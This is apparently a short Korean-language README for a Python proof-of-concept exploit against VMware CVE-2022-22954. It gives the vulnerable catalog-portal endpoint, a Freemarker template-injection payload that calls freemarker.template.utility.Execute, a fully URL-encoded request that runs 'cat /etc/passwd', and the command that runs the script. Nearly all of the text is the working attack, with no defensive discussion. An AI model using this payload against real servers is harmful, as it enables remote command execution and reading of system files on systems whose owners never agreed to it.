
catalog-portal UI의 Freemarker 템플릿 주입을 통해 VMware CVE-2022-22954를 악용하는 Python PoC로, 취약한 VMware 서버에서 원격 명령 실행을 가능하게 합니다.
VMware CVE-2022-22954 악용을 위한 개념 증명(Proof of Concept)
이 간단한 Python 스크립트는 지정된 URL에 /catalog-portal/ui/oauth/verify?error=&deviceUdid=를 추가한 뒤, 그 다음에 다음 문자열의 URL 인코딩 버전을 붙여 GET 요청을 보냅니다:
${"freemarker.template.utility.Execute"?new()("command")}
예를 들어, "cat /etc/passwd"에 대한 출력은 다음과 같습니다:
{host}/catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%22%29%7d
python3 exploit.py <URL>